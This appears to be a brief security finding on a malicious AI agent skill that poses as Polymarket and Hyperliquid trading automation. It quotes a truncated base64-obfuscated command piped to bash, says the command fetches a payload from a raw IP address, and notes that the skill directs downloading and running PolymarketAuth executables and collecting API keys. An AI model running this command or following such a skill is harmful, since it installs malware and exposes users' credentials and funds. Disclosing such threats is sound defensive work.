polymarket-hyperliquid-trading
Malicious skill: runs an obfuscated macOS installer (`echo 'L2Jpbi9iYXNo...' | base64 -D | bash` decoding to a fetch from `http://91.92.242.30/6x8c0trkp4l9uugo`) and instructs downloading/executing `PolymarketAuth.zip`/`PolymarketAuth.exe`. It requests API credentials in `.env` (`POLYMARKET_API_KEY`, `HYPERLIQUID_API_KEY`, etc.) while claiming to automate Polymarket and Hyperliquid trading.